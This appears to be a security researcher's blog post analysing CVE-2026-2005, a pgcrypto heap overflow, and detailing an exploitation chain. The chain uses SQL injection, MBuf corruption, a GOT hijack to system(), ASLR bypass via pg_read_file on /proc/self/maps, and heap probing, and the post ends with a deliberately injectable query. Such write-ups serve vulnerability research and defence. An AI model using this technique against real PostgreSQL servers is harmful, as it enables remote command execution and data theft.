Smashing pgcrypto for fun and profit: Analyzing and exploiting CVE-2026-2005

Today's post covers how we explored, analyzed, and (up to a point) exploited a heap buffer overflow in Postgres that was discovered during the recent zeroday.cloud competition. The vulnerability caught our interest immediately because it can turn an SQL query (in practice, an SQL injection) into full-on remote command execution (popping a calc, as they used to say).

This post is intended to entertain AppSec engineers, low-level enthusiasts, vulnerability researchers, and every other curious fella out there who likes breaking mission-critical software 🤘.

PostgreSQL is probably the most popular open-source relational database in production today. It runs behind everything, from small web apps to massive financial systems. One of its selling points is its extension ecosystem - modular libraries that add functionality to the core database. pgcrypto is one of those extensions. It ships with PostgreSQL itself and provides cryptographic functions: hashing, symmetric encryption, and PGP (Pretty Good Privacy) message encryption and decryption.

PGP is one of those protocols that has been around forever. It wraps data in a layered packet format: you have key packets, encrypted session key packets, and encrypted data packets, all described in RFC 4880. The core flow for public-key decryption is: RSA-decrypt the session key from the first packet, then use that session key to AES-decrypt the actual data from the second packet.

pgcrypto implements this from scratch in C, inside the PostgreSQL server process. No sandboxing, no privilege separation. If something goes wrong in pgcrypto's code, it goes wrong with the full privileges of the database server.

And something went wrong! CVE-2026-2005 is a heap buffer overflow in pgcrypto's PGP public-key decryption path. A missing bounds check on the RSA-decrypted session key allows an attacker to write up to 210 bytes past the end of a 32-byte buffer, corrupting adjacent heap allocations. This post walks through our attempt to turn that into a reliable-ish, fully remote code execution exploit: one that can be delivered entirely through a SQL injection vulnerability in a web application, without the attacker ever connecting to PostgreSQL directly.

Before we get into the exploit, a quick primer on what "heap buffer overflow" actually means for anyone who hasn't spent their weekends staring at memory layouts.

A brief detour: heaps and overflows

When a program needs memory at runtime, it asks the operating system's heap allocator for a chunk. The allocator carves up a large region of memory into smaller blocks and hands them out on request. When you call malloc(184) in C, you get back a pointer to at least 184 usable bytes. The allocator almost never hands you exactly what you asked for, though.

Real allocators are organized around bins: pre-sized buckets of free chunks. When a request comes in, the allocator rounds the size up to the nearest bin and returns a chunk from there. Rounding lets it reuse freed chunks quickly (same-size requests come back to the same bin) and keeps allocation metadata simple. The bins themselves are a fixed staircase of sizes: common schemes are powers of two (8, 16, 32, 64, …) or fine-grained steps for small sizes plus coarser steps for large ones.

For this bug, the allocator that matters is PostgreSQL's AllocSet (PostgreSQL doesn't call malloc directly for short-lived allocations; it has its own pool allocator with a wrapper called palloc). AllocSet uses power-of-two bins indexed by fidx, where freelist fidx holds chunks of size 1 << (fidx + 3): 8, 16, 32, 64, 128, 256, 512, …, up to 8192 bytes. So when pgcrypto calls palloc(sizeof(PGP_Context)) with sizeof(PGP_Context) = 184, the allocator rounds up to the next bin (fidx = 5, 256 bytes) and returns a chunk from that freelist. The 72 bytes of slack between the struct's end (offset 184) and the chunk's end (offset 256) are dead padding, but they live inside the same chunk and are physically adjacent to whatever the allocator hands out next.
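The rounding rule is easy to check by hand. Here is a minimal Python sketch of the bin formula quoted above; the name aset_bin is ours (hypothetical, not a PostgreSQL function), and it deliberately ignores requests above 8192 bytes, which take a different path in the allocator.

```python
def aset_bin(request_size, min_bits=3, max_chunk=8192):
    """Return (fidx, chunk_size) for a request, using chunk size 1 << (fidx + 3).

    Illustrative model only: aset_bin is a hypothetical helper, and requests
    larger than max_chunk are rejected rather than modelled.
    """
    if not 0 < request_size <= max_chunk:
        raise ValueError("outside the freelist-managed range")
    fidx = 0
    while (1 << (fidx + min_bits)) < request_size:
        fidx += 1
    return fidx, 1 << (fidx + min_bits)


for name, size in (("PGP_Context", 184), ("MBuf", 40)):
    fidx, chunk = aset_bin(size)
    print(f"{name}: request={size} fidx={fidx} chunk={chunk} slack={chunk - size}")
```

For the two structs that matter later, this gives a 256-byte chunk with 72 bytes of slack for PGP_Context and a 64-byte chunk with 24 bytes of slack for MBuf.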

That last sentence is the point. Allocations from the same bin sequence end up adjacent in memory:

[chunk A] [chunk B] [chunk C]

A heap buffer overflow happens when code writes more data into chunk A than the chunk can hold. The excess spills into chunk B and possibly chunk C, corrupting whatever data structures live there. If an attacker controls what gets written (the overflow content) and there are useful data structures in the adjacent chunks (function pointers, buffer descriptors, etc.), this can be turned into code execution. The overflow distance is measured in chunk sizes, not struct sizes, a fact we'll lean on heavily in the next section.

The bug

The vulnerability lives in pgp_parse_pubenc_sesskey() in contrib/pgcrypto/pgp-pubdec.c. When PostgreSQL decrypts a PGP message using a public key, it RSA-decrypts the session key packet and copies the result into a buffer on the PGP_Context structure:

ctx->cipher_algo = *msg;
ctx->sess_key_len = msglen - 3;
memcpy(ctx->sess_key, msg + 1, ctx->sess_key_len);

sess_key is a 32-byte fixed buffer (uint8 sess_key[PGP_MAX_KEY]) sitting near the end of PGP_Context. The msg pointer comes from RSA-decrypted PKCS#1 v1.5 plaintext - essentially, the raw bytes that were encrypted inside the PGP message. For an RSA-2048 key, this plaintext can be up to 245 bytes (256 minus the minimum 11 bytes of PKCS#1 padding). After subtracting 3 bytes of protocol overhead (1 algorithm byte + 2 checksum bytes), sess_key_len can reach 242. That's 210 bytes past the end of the 32-byte buffer.
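The arithmetic in that paragraph, spelled out as a small Python check. The constant names are ours; the numbers are the ones quoted above.

```python
RSA_MODULUS_BYTES = 2048 // 8   # 256-byte modulus for RSA-2048
PKCS1_MIN_OVERHEAD = 11         # 0x00, 0x02, at least 8 padding bytes, 0x00
PROTOCOL_OVERHEAD = 3           # 1 algorithm byte + 2 checksum bytes
SESS_KEY_BUF = 32               # sizeof(ctx->sess_key), i.e. PGP_MAX_KEY

max_plaintext = RSA_MODULUS_BYTES - PKCS1_MIN_OVERHEAD
max_sess_key_len = max_plaintext - PROTOCOL_OVERHEAD
max_overflow = max_sess_key_len - SESS_KEY_BUF

print(max_plaintext, max_sess_key_len, max_overflow)  # 245 242 210
```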

There is no length check between the RSA decryption and the memcpy.

The particularly nice thing about this bug (from an attacker's perspective): you only need the public key. The attacker constructs whatever payload they want, pads it with PKCS#1 v1.5, encrypts it with the RSA public key, and wraps it in a PGP packet. The server decrypts with the private key, recovers the oversized plaintext, and dutifully memcpys it into the 32-byte buffer. The 2-byte checksum at the end is trivially satisfied since the attacker controls the entire plaintext.

Kudos to Team Xint Code for finding and disclosing this as part of the zeroday.cloud competition!

Taint flow to the sink

To make the bug concrete, here's the data flow from attacker input to the memcpy. Everything from row 1 onward is attacker-controlled. There is no sanitization step where the taint dies, only checks that fail to bound the length.

| # | Variable / call | Where it comes from | Taint |
|---|---|---|---|
| 1 | msg_bytea | First argument to pgp_pub_decrypt_bytea(msg_bytea, key), direct from SQL | source |
| 2 | RSA ciphertext c | pgp_mpi_read(pkt, &c) parses an MPI out of msg_bytea | tainted |
| 3 | RSA plaintext m | pgp_rsa_decrypt(pk, c, &m), but the attacker chose c such that decryption produces m = 0x00 ‖ 0x02 ‖ PS ‖ 0x00 ‖ payload | tainted |
| 4 | msg | msg = check_eme_pkcs1_v15(m->data, m->bytes) returns the byte after the 0x00 separator. Validates only the leading 0x02 and ≥8 padding bytes | tainted (pointer) |
| 5 | msglen | msglen = m->bytes - (msg - m->data) (payload length, derived from the attacker-chosen RSA plaintext) | tainted (size) |
| 6 | ctx->sess_key_len | msglen - 3 (algo byte + 2-byte checksum). Checksum is also in attacker bytes, so it's trivially passed | tainted (size, unbounded) |
| 7 | Sink 1 | memcpy(ctx->sess_key, msg + 1, ctx->sess_key_len) at pgp-pubdec.c:228. ctx->sess_key is a fixed 32-byte field; both source bytes and length are attacker-tainted → heap buffer overflow | sink |

After Sink 1 fires, the spillover bytes have rewritten the adjacent src and dst MBuf descriptor structs (chunk layout in the next section). Execution doesn't stop there: pgp_decrypt continues into the second PGP packet, with the corrupted MBufs now in the data path:

| # | Variable / call | Where it comes from | Taint |
|---|---|---|---|
| 8 | src->read_pos, dst->data_end, dst->buf_end | written by Sink 1's overflow at fixed offsets within the spilled bytes | tainted (pointers) |
| 9 | AES-CFB plaintext stream | symmetric decrypt of the second PGP packet, under a key copied from the same overflow bytes (sess_key[0:16]); attacker pre-computed the ciphertext | tainted |
| 10 | buf, len in mbuf_append(dst, buf, len) | parsed LITERAL_DATA body from the AES-CFB stream | tainted |
| 11 | Sink 2 | memcpy(dst->data_end, buf, len) inside mbuf_append (mbuf.c:104). All three of destination, source bytes, and length are tainted → arbitrary write | sink |

Two sinks, reached entirely from a single pgp_pub_decrypt_bytea(...) call, meaning a single SQL injection hop. Sink 1 is the primitive the CVE actually describes; Sink 2 is what the corrupted MBuf state turns Sink 1 into. The rest of the post is plumbing on top of Sink 2.

Figure 1: Taint flow from SQL argument to memory-corruption sinks. Data-dependency chain from the msg_bytea SQL argument through both sinks. The yellow check_eme_pkcs1_v15 step is the only validation in the path, and it only inspects the PKCS#1 envelope shape; it never bounds msglen, so the taint flows past it (gold dashed arrow). Sink 1 is the CVE itself; Sink 2 is the arbitrary-write primitive it builds.
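To see why the envelope check doesn't help, here is a small Python model of rows 4 to 6. It is not a port of the C function: it models only the two properties the table attributes to check_eme_pkcs1_v15 (leading 0x02, at least 8 nonzero padding bytes), and it assumes the leading 0x00 of the RSA plaintext is not part of the buffer being checked. The function names ending in _model and sess_key_len_for are ours.

```python
def check_eme_pkcs1_v15_model(data: bytes):
    """Return the payload after the 0x00 separator, or None if the envelope is malformed.

    Assumption: `data` starts at the 0x02 byte (leading 0x00 already dropped).
    Only the envelope shape is inspected; the payload length is never bounded.
    """
    if len(data) < 1 + 8 + 1 or data[0] != 0x02:
        return None
    sep = data.find(b"\x00", 1)          # first zero byte ends the padding string
    if sep == -1 or sep - 1 < 8:         # need at least 8 padding bytes
        return None
    return data[sep + 1:]


def sess_key_len_for(payload_len: int, modulus_bytes: int = 256) -> int:
    """Wrap payload_len bytes in a well-formed envelope and return msglen - 3."""
    pad_len = modulus_bytes - 3 - payload_len     # PS fills whatever space is left
    em = b"\x02" + b"\xff" * pad_len + b"\x00" + b"A" * payload_len
    msg = check_eme_pkcs1_v15_model(em)
    assert msg is not None, "envelope rejected"
    return len(msg) - 3


print(sess_key_len_for(16 + 3))     # an honest AES-128 session key
print(sess_key_len_for(222 + 3))    # the oversized payload used in this post
```

Both envelopes pass the shape check. The only difference is how much of the modulus is spent on padding versus payload, and nothing downstream compares the resulting length against the 32-byte buffer.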

What's next door on the heap

210 bytes of overflow is a lot, but it's only useful if there's something interesting to corrupt in the adjacent memory. We needed to understand exactly what gets allocated right after PGP_Context.

The function decrypt_internal() in pgp-pgsql.c is the SQL-callable entry point. It allocates three main objects in sequence:

init_work(&ctx, ...);                    // palloc0(sizeof(PGP_Context))  = palloc0(184)
src = mbuf_create_from_data(data, len);  // palloc(sizeof(MBuf))          = palloc(40)
dst = mbuf_create(data_size + 2048);     // palloc(sizeof(MBuf)) + palloc(data_size + 2048)

ctx is the PGP context structure (where the overflow originates). src is a memory buffer descriptor pointing at the input ciphertext. dst is a memory buffer descriptor for the decrypted output. On a fresh query, PostgreSQL's AllocSet allocator serves these from consecutive positions in the same block:

[BlockHdr(40)] [ChunkHdr(8)|ctx(256)] [ChunkHdr(8)|src(64)] [ChunkHdr(8)|dst(64)] [ChunkHdr(8)|dst_data(N)]

The numbers in parentheses are chunk sizes, not struct sizes. AllocSet rounds up to the next power of 2: sizeof(PGP_Context) = 184 rounds to 256, sizeof(MBuf) = 40 rounds to 64. Each chunk is prefixed by an 8-byte MemoryChunk header that the allocator uses to track ownership.

Here's the key insight that takes a while to internalize: the overflow distance is determined by the chunk size (256), not the struct size (184). There are 72 bytes of dead padding between the end of the struct and the end of its chunk. The overflow sails through this padding, over src's 8-byte chunk header, and lands on src's pointer fields. It then continues through src's 64-byte chunk and into dst.

There's also a lucky detail: mbuf_create_from_data does not allocate a separate data buffer; it just wraps an existing pointer. So there's no intervening allocation between src and dst. The layout is tight: ctx | src_MBuf | dst_MBuf, all reachable from a single overflow.

Confirming everything with holy GDB:

sizeof(PGP_Context) = 184    sess_key at offset 148
sizeof(MBuf)        = 40     (data, data_end, read_pos, buf_end, no_write, own_data)
sizeof(MemoryChunk) = 8      (just the hdrmask)

From sess_key[0], the src MBuf's data pointer sits at overflow byte 116, and dst's at byte 188. Both are well within reach of our 222-byte payload.

Figure 2: palloc heap layout during pgp_decrypt(). The 256B ctx chunk is followed immediately by the 64B src MBuf chunk and dst MBuf chunk. The overflow from sess_key at struct offset +148 crosses both boundaries; payload bytes at +108, +116, +180, +188 reprogram both MBuf descriptors.
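The offsets in the figure follow mechanically from the three GDB numbers. The sketch below recomputes them in Python. It is our own illustration rather than the exploit's layout routine, and it assumes an x86-64 build where MBuf is four 8-byte pointers followed by two 1-byte flags, in the field order shown in the GDB output.

```python
def aset_chunk_size(n):
    """Round a request up to the next power-of-two chunk size (minimum 8)."""
    size = 8
    while size < n:
        size *= 2
    return size


def overflow_offsets(sizeof_ctx=184, sizeof_mbuf=40, sess_key_off=148, chunk_hdr=8):
    """Offsets of the src/dst chunk headers and MBuf fields, measured from sess_key[0]."""
    # Assumed MBuf field offsets: 8-byte pointers, then two 1-byte flags.
    fields = {"data": 0, "data_end": 8, "read_pos": 16, "buf_end": 24,
              "no_write": 32, "own_data": 33}
    src_hdr = aset_chunk_size(sizeof_ctx) - sess_key_off   # end of the ctx chunk
    src = src_hdr + chunk_hdr
    dst_hdr = src + aset_chunk_size(sizeof_mbuf)           # end of the src chunk
    dst = dst_hdr + chunk_hdr
    layout = {"off_src_hdrmask": src_hdr, "off_dst_hdrmask": dst_hdr}
    for name, off in fields.items():
        layout[f"off_src_{name}"] = src + off
        layout[f"off_dst_{name}"] = dst + off
    return layout


layout = overflow_offsets()
for key in ("off_src_hdrmask", "off_src_data", "off_dst_hdrmask", "off_dst_data"):
    print(key, layout[key])
print("payload bytes needed:", max(layout.values()) + 1)
```

Under these assumptions the last byte the payload has to reach is dst's own_data flag at offset 221, which is where the 222-byte payload size comes from.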


Turning decryption into an arbitrary write

This is where things get interesting. After the overflow corrupts both MBuf structs, execution doesn't stop; it continues into pgp_decrypt(), which processes the second PGP packet in the message (the SYMENCRYPTED_DATA packet). The decryption pipeline reads ciphertext from src and writes plaintext to dst. We control both of those now.

The call chain is: parse_symenc_data() sets up AES-128-CFB decryption using ctx->sess_key (which we just overwrote with bytes 0-15 of our payload). Then process_data_packets() parses the decrypted stream, finds a LITERAL_DATA packet, and parse_literal_data() calls mbuf_append(dst, buf, len) which writes at dst->data_end.

So the pipeline becomes:

  1. Read ciphertext from where src->read_pos points (we control this)
  2. AES-CFB decrypt with our chosen key (we control this)
  3. Parse the decrypted stream as PGP packets
  4. Write the LITERAL_DATA body to where dst->data_end points (we control this)

We control the key and the ciphertext, so we can pre-compute the ciphertext such that after decryption, it produces a valid PGP LITERAL_DATA packet containing whatever bytes we want. Thus, the decryption pipeline becomes our write primitive.

To make this work, PGP's CFB "resync" mode had to be reimplemented in Python. PGP doesn't use standard CFB: after the second block (which is only 2 bytes), it shifts the feedback register with encbuf[2:16] + encbuf[0:2]. We spent some time getting this right before the encrypt/decrypt routine round-tripped correctly. The implementation is pgp_cfb_encrypt() in the PoC listing, for the curious.
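The resync rule is easier to see in a one-shot form than in the streaming version. The sketch below is a simplified model we wrote for illustration: it processes a 16-byte block, then a 2-byte block, then 16-byte blocks, always feeding the last 16 ciphertext bytes back in. To stay dependency-free it uses a truncated SHA-256 as a stand-in for the AES block encryption, which is fine for checking the round trip (CFB only ever uses the cipher in the encrypt direction) but obviously produces different bytes than real AES.

```python
import hashlib


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for one AES-ECB block encryption. NOT AES: truncated SHA-256."""
    return hashlib.sha256(key + block).digest()[:len(block)]


def pgp_cfb_resync(key, data, decrypting, bs=16):
    """One-shot model of PGP CFB with a resync after the 2-byte second block."""
    out, ct = bytearray(), bytearray()
    fr = bytes(bs)                       # feedback register starts as a zero IV
    idx = seg_no = 0
    while idx < len(data):
        seg_len = 2 if seg_no == 1 else bs
        seg = data[idx:idx + seg_len]
        keystream = toy_block_encrypt(key, fr)
        res = bytes(a ^ b for a, b in zip(seg, keystream))
        out += res
        ct += seg if decrypting else res  # always track the ciphertext side
        fr = bytes(ct[-bs:])              # after the 2-byte block this is ct[2:18]
        idx += len(seg)
        seg_no += 1
    return bytes(out)


key = b"k" * 16
plaintext = bytes(range(50))
ciphertext = pgp_cfb_resync(key, plaintext, decrypting=False)
assert pgp_cfb_resync(key, ciphertext, decrypting=True) == plaintext
```

Taking the last 16 ciphertext bytes after the short block yields ct[2:18], which is the same value as encbuf[2:16] + encbuf[0:2] in the description above.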

One important subtlety: the PGP prefix check. The first 18 decrypted bytes are a "prefix" where bytes 14-15 must match bytes 16-17. We make them mismatch deliberately, which sets ctx->corrupt_prefix = 1. But this is a deferred error: the pipeline processes all the data (including our write) before checking the flag. By the time pgp_decrypt returns "corrupt data", mbuf_append has already written our payload to the target address.

This gives us an arbitrary write of controlled data to a controlled address, with the small constraint that the data passes through the PGP packet parser (~8 bytes of framing overhead per write).
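The framing overhead can be counted directly. This sketch restates the old-format packet helper from the PoC so that it runs on its own; literal_packet and framing_overhead are names we made up for the illustration.

```python
import struct

PGP_PKT_LITERAL = 11


def old_pkt(tag, body):
    """Old-format PGP packet: header with a 1-, 2- or 4-byte length, then the body."""
    n = len(body)
    if n < 256:
        hdr = bytes([0x80 | (tag << 2) | 0, n])
    elif n < 65536:
        hdr = bytes([0x80 | (tag << 2) | 1]) + struct.pack(">H", n)
    else:
        hdr = bytes([0x80 | (tag << 2) | 2]) + struct.pack(">I", n)
    return hdr + body


def literal_packet(data):
    # format byte 'b', empty filename (length 0), 4-byte timestamp, then the data
    return old_pkt(PGP_PKT_LITERAL, b"\x62\x00" + b"\x00" * 4 + data)


def framing_overhead(data_len):
    """Bytes of LITERAL_DATA framing around a write of data_len bytes."""
    return len(literal_packet(bytes(data_len))) - data_len


print(framing_overhead(8))     # an 8-byte pointer write
print(framing_overhead(17))    # a short command string
```

For the short writes used in this post the overhead is a 2-byte packet header plus 6 bytes of literal-data metadata. This count excludes the 18-byte CFB prefix, which also sits in the decrypted stream ahead of the packet.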

Figure 3: MBuf fields before and after overflow. src MBuf redirected to the attacker's ciphertext in the SQL execution buffer; dst MBuf redirected to an arbitrary write target. The decryption pipeline then runs normally, reading from src and writing to dst.

GOT hijack

Now there is an arbitrary write. The question is: what to write where?

Well, you can go with a classic approach: overwrite pfree@GOT in pgcrypto.so with system@libc.

For readers not steeped in binary exploitation: shared libraries (.so files) use a mechanism called the Global Offset Table (GOT) to call external functions. When pgcrypto calls pfree() (PostgreSQL's memory deallocation function), it doesn't jump directly; it looks up the address in the GOT and jumps there. If we overwrite that GOT entry with the address of system() (the libc function that executes shell commands), then every subsequent pfree(ptr) becomes system(ptr).

pgcrypto calls pfree all over its cleanup paths. The relevant code in mbuf_free():

if (mbuf->own_data) {
    px_memset(mbuf->data, 0, mbuf->buf_end - mbuf->data);
    pfree(mbuf->data);    // after GOT overwrite: system(mbuf->data)
}
pfree(mbuf);

The attack is three pipeline writes:

  1. Write the address of system@libc (8 bytes) to pfree@GOT
  2. Write a command string ("touch /tmp/pwned\0") to a safe location in pgcrypto's .bss section (a region of writable static memory)
  3. Trigger: send an overflow where dst->data = .bss_cmd_addr, dst->own_data = 1, and dst->buf_end = dst->data (so px_memset zeroes 0 bytes - a no-op). When cleanup calls mbuf_free(dst), it executes pfree(.bss_cmd) which is now system("touch /tmp/pwned").

The intermediate pfree calls on other heap pointers during cleanup execute system(garbage_heap_address), which just produces "sh: syntax error" and returns harmlessly.

Resolving addresses without hardcoding anything

The initial version of this exploit had hardcoded offsets for pfree@GOT, system@libc, .bss, and all the struct sizes. It worked on our build, but changing compiler flags, updating libc, or even recompiling PostgreSQL would break everything.

We wanted zero hardcoded binary offsets. The fix: resolve everything at runtime by reading the target's own binaries through SQL.

PostgreSQL has two built-in file-read functions available to users with the pg_read_server_files role:

pg_read_file('/proc/self/maps')              -- text file read
pg_read_binary_file('/path/to/file', off, n) -- binary read with offset

From /proc/self/maps we get library base addresses and filesystem paths. Then we read the actual .so files from disk and parse their ELF structures - the standard binary format on Linux.
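As an illustration of the first step, here is a minimal parser for the text that pg_read_file('/proc/self/maps') returns. The function name and the sample addresses and paths are made up for the example; only the line format (address range, permissions, offset, device, inode, pathname) is the standard Linux one.

```python
def parse_maps(maps_text):
    """Return {pathname: lowest start address} for file-backed mappings and [heap]."""
    bases = {}
    for line in maps_text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue                      # anonymous mapping, no pathname
        path = parts[5].strip()
        if not (path.startswith("/") or path == "[heap]"):
            continue
        start = int(parts[0].split("-")[0], 16)
        bases[path] = min(start, bases.get(path, start))
    return bases


# Hypothetical sample; real addresses differ on every run because of ASLR.
SAMPLE = """\
55d0c1a00000-55d0c1a21000 rw-p 00000000 00:00 0                          [heap]
7f3a10000000-7f3a10005000 r--p 00000000 08:01 131                        /usr/lib/postgresql/lib/pgcrypto.so
7f3a10005000-7f3a10015000 r-xp 00005000 08:01 131                        /usr/lib/postgresql/lib/pgcrypto.so
7f3a20000000-7f3a20028000 r--p 00000000 08:01 77                         /usr/lib/x86_64-linux-gnu/libc.so.6
7f3a30000000-7f3a30002000 rw-p 00000000 00:00 0
"""

for path, base in parse_maps(SAMPLE).items():
    print(f"{base:#x} {path}")
```

The lowest mapping of each file is its load base, which is what the file offsets and virtual addresses parsed out of the ELF get added to.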

  • pfree@GOT: Parse pgcrypto.so's PT_DYNAMIC segment to find the .rela.plt relocation table, then scan entries matching the pfree symbol. We used the DYNAMIC segment instead of section headers because it survives aggressive stripping. Takes ~5 SQL queries.
  • system@libc: Parse libc.so's .dynsym + .dynstr symbol tables to find system's virtual address offset. Another 5 queries.
  • .bss: Parse pgcrypto.so's section headers for the .bss address and size. 3 queries.
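The first hop of the pfree@GOT lookup, locating PT_DYNAMIC, can be sketched with nothing but struct. This is our own illustration for little-endian ELF64 files, not the exploit's resolver. The read argument is any callable that returns size bytes at a file offset, so it works equally with a local file or with a remote reader in the style of the rb(off, sz) helper from the PoC.

```python
import struct

PT_DYNAMIC = 2


def find_pt_dynamic(read):
    """Return (p_offset, p_vaddr, p_filesz) of the PT_DYNAMIC segment, or None.

    `read(offset, size) -> bytes` abstracts how the file is fetched.
    Handles little-endian ELF64 only.
    """
    ehdr = read(0, 64)
    if ehdr[:4] != b"\x7fELF" or ehdr[4] != 2 or ehdr[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (e_phoff,) = struct.unpack_from("<Q", ehdr, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", ehdr, 0x36)
    phdrs = read(e_phoff, e_phentsize * e_phnum)   # one read for the whole table
    for i in range(e_phnum):
        p_type, _flags, p_offset, p_vaddr, _paddr, p_filesz = struct.unpack_from(
            "<IIQQQQ", phdrs, i * e_phentsize)
        if p_type == PT_DYNAMIC:
            return p_offset, p_vaddr, p_filesz
    return None


def file_reader(path):
    """Local-file reader with the same shape as a remote one."""
    def read(off, size):
        with open(path, "rb") as fh:
            fh.seek(off)
            return fh.read(size)
    return read
```

This costs two reads: the 64-byte ELF header and the program header table. Walking the dynamic entries to reach the relocation and symbol tables continues from the returned offset.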

Struct sizes from disassembly

This was the part we were most pleased with. The overflow field offsets depend on sizeof(PGP_Context), sizeof(MBuf), and the sess_key offset within the struct, all of which vary between builds. Instead of shipping precomputed offset tables (like kernel exploits often do), the exploit reads the machine code of three functions from pgcrypto.so and extracts the palloc size arguments directly:

pgp_init():                    bf b8 00 00 00    mov $0xb8, %edi     -> sizeof(PGP_Context) = 184
mbuf_create_from_data():       bf 28 00 00 00    mov $0x28, %edi     -> sizeof(MBuf) = 40
pgp_parse_pubenc_sesskey():    48 05 94 00 00 00 add $0x94, %rax     -> sess_key offset = 148

The pattern matching scans for 0xbf (mov imm32 to edi) before call instructions, and 0x48 0x05 (add imm32 to rax) before the memcpy call. From these three numbers, compute_layout() calculates every overflow field offset and the two MemoryChunk hdrmask values using the AllocSet encoding formula:
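A deliberately naive version of the first pattern looks like this. It is a sketch, not the exploit's matcher: it only accepts a mov $imm32, %edi that is immediately followed by a near call (opcode e8), which is a stricter assumption than real compiler output guarantees, and a raw byte scan like this can produce false positives on unrelated data.

```python
import struct


def palloc_size_args(code: bytes):
    """Yield imm32 from each `bf imm32` (mov $imm32, %edi) directly followed by `e8` (call)."""
    i = 0
    while i + 6 <= len(code):
        if code[i] == 0xBF and code[i + 5] == 0xE8:
            yield struct.unpack_from("<I", code, i + 1)[0]
            i += 5            # skip past the mov; the call is examined next
        else:
            i += 1


# push %rbp; mov %rsp,%rbp; mov $0xb8,%edi; call <rel32>; ret
sample = bytes.fromhex("55 48 89 e5 bf b8 00 00 00 e8 11 22 33 44 c3")
print(list(palloc_size_args(sample)))   # [184]
```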

hdrmask = (block_offset << 34) | (freelist_index << 5) | MCTX_ASET_ID

The hdrmask encodes which allocator block and freelist bucket own each chunk. Get it wrong and pfree crashes trying to find the owning memory context. Get it right and cleanup proceeds normally. The backend survives and the GOT write persists for future queries.
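Plugging the layout from earlier into that formula gives concrete values. Treat the following as a worked example under stated assumptions, not as a statement about every PostgreSQL version: it takes the formula exactly as written above, assumes MCTX_ASET_ID is 3 on the targeted build, assumes ctx is the first chunk after the 40-byte block header, and assumes block_offset is measured from the start of the block to the chunk's header.

```python
MCTX_ASET_ID = 3          # assumption: AllocSet's method ID on the targeted build
BLOCK_HDR, CHUNK_HDR = 40, 8


def hdrmask(block_offset, freelist_index, method_id=MCTX_ASET_ID):
    """Encode a chunk header using the formula quoted in the text."""
    return (block_offset << 34) | (freelist_index << 5) | method_id


# Chunk header positions inside the block, per the layout diagram.
ctx_hdr_off = BLOCK_HDR                       # ctx chunk: 256 bytes, fidx 5
src_hdr_off = ctx_hdr_off + CHUNK_HDR + 256   # src chunk: 64 bytes, fidx 3
dst_hdr_off = src_hdr_off + CHUNK_HDR + 64    # dst chunk: 64 bytes, fidx 3

print("src:", src_hdr_off, hex(hdrmask(src_hdr_off, 3)))
print("dst:", dst_hdr_off, hex(hdrmask(dst_hdr_off, 3)))
```

These are the two 8-byte values the overflow has to rewrite faithfully at payload offsets +108 and +180, since it cannot skip over the chunk headers on its way to the MBuf fields.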

Blind heap calibration (and the 29KB surprise)

The pipeline write needs to know where the SQL argument's bytea data lives on the heap. Specifically, src->read_pos must point at the SYMENCRYPTED_DATA packet within that bytea. This address varies between PostgreSQL restarts because of ASLR and allocator state.

Our approach: blind .bss probing. For each candidate heap offset, send a pipeline write attempting to write a marker string to a known .bss address, then read .bss via /proc/self/mem to check if the marker landed. Wrong guesses produce a PGP error but no crash: the backend survives and the connection stays alive.

The search uses a spiral pattern outward from a center estimate, stepping by 8 bytes (matching palloc's alignment). On direct PostgreSQL connections this was fast: about 29 probes to lock the offset.

Then we tried to run it through the SQL injection chain and it stopped working.

We spent way too long debugging this. The direct exploit (parameterized queries via psycopg) found the offset at heap + 0x9D394. The SQLi exploit (an inline decode('<hex>','hex') literal through the web app) found... nothing. 4000 probes, all misses. We added verbose logging, dumped .bss after every probe, and verified the payload bytes were identical. Still nothing.

Eventually our lord and saviour GDB caught the actual address: heap + 0x195D3C. That's ~1MB deeper into the heap. The SQL parser and executor allocate tons of intermediate structures when processing an inline decode('deadbeef...', 'hex') literal containing hundreds of hex characters. Those allocations push the bytea argument much further into the heap compared to a parameterized query.

But it got worse. We switched from file-based PGP keys (2522-byte secret key) to attacker-generated keys (1846-byte secret key) and the offset jumped by another 29KB. The second bytea argument (the secret key) is also palloc'd, and its size changes the allocation pattern for everything after it. Mixing key sizes between calibration and the real exploit causes silent failure: the pipeline write targets the wrong address and nothing happens.

The final parameters: center at 0x199580 (midpoint of observed range), ±32KB range, 8-byte steps. Typically finds it in ~3600 probes with zero crashes. Not the fastest, but kinda reliable.
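To put those parameters in perspective, here is the spiral generator from the PoC run on its own, counting candidates instead of sending probes.

```python
def spiral(center, half_range, step):
    """Yield center, center+step, center-step, center+2*step, ... within half_range."""
    for d in range(0, half_range, step):
        yield center + d
        if d:
            yield center - d


CENTER, HALF_RANGE, STEP = 0x199580, 0x8000, 8
candidates = list(spiral(CENTER, HALF_RANGE, STEP))

print(len(candidates))                          # 8191 candidates in the worst case
print([hex(c) for c in candidates[:5]])
print(abs(candidates[3599] - CENTER))           # distance covered after 3600 probes
```

A hit after roughly 3600 probes means the real offset was about 14 KB away from the center estimate, so the ±32KB window leaves a bit more than a factor of two of headroom.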

The full SQLi chain

Putting it all together. The demo target is a web application with a UNION-based SQL injection in a search endpoint. The PostgreSQL backend has pgcrypto loaded and the database user has pg_read_server_files.

  1. Recon (3 HTTP requests): SELECT version(), verify pgcrypto is installed, force the .so to load via digest()
  2. Key generation (0 requests): Generate an RSA-2048 keypair locally in PGP format. No database keys needed - the attacker brings their own.
  3. ASLR bypass (1 request): pg_read_file('/proc/self/maps') through the injection
  4. Binary analysis (~15 requests): Parse ELF structures of pgcrypto.so and libc.so to resolve pfree@GOT, system@libc, .bss, and struct sizes
  5. Heap calibration (~3600 requests): Blind .bss probe spiral to find the bytea heap address
  6. GOT overwrite (1 request): Pipeline write system@libc to pfree@GOT, verified via /proc/self/mem
  7. Command write (1 request): Pipeline write command string to .bss, verified
  8. Trigger (1 request): pfree(.bss_cmd) -> system(cmd)

The webapp's persistent database connection is critical: every HTTP request hits the same PostgreSQL backend process, so the GOT overwrite from step 6 is still in effect when step 8 fires.

The PoC

To demonstrate the full chain, we built a small Flask web application (webapp.py) that simulates a product catalog backed by PostgreSQL with pgcrypto. It has a /search endpoint with a textbook SQL injection: user input interpolated directly into a query.

sql = f"SELECT id, name, description, price FROM products WHERE name ILIKE '%{q}%'"

